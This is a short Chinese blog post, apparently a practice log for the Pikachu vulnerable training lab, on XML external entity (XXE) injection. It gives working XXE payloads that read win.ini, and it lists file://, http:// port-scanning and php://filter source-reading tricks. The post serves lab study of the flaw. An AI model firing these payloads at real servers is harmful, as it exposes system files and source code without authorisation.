Pikachu靶场练习记录--7--XXE(外部实体注入)

        1.简述

        XXE是外部实体注入漏洞,用户通过输入XML实体内容,编写代码时有没有进行过滤,导致的漏洞。

        利用和查看XXE漏洞的方法

                1.直接通过DTD外部实体声明

        <!DOCTYPE 根元素 SYSTEM "文件名">

        <?xml version ="1.0"?><!DOCTYPE ANY [
        <!ENTITY f SYSTEM "file:///C://Windows//win.ini" >]>

        <x>&f;</x>

                2.用BP抓包进行修改查看是否存在XXE漏洞

这是有回显的

        2.常见的三种协议

        file:///路径/file.ext    #读取文件
        http://xxx.com:80               #端口扫描
        php://filter/read=convert.base64-encode/resource=文件.php       #读取源代码

3.皮卡丘靶场演示

        1.利用简单的XML代码找到XXE漏洞

        2.利用XXE漏洞读取其他文件

        利用构建外部实体

<?xml version="1.0"?>
<!DOCTYPE a[
    <!ENTITY b SYSTEM "file:///C:/Windows/win.ini">
]>
<a>&b;</a>

与上文的常见的三种协议相结合,可以达到你的目的。 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值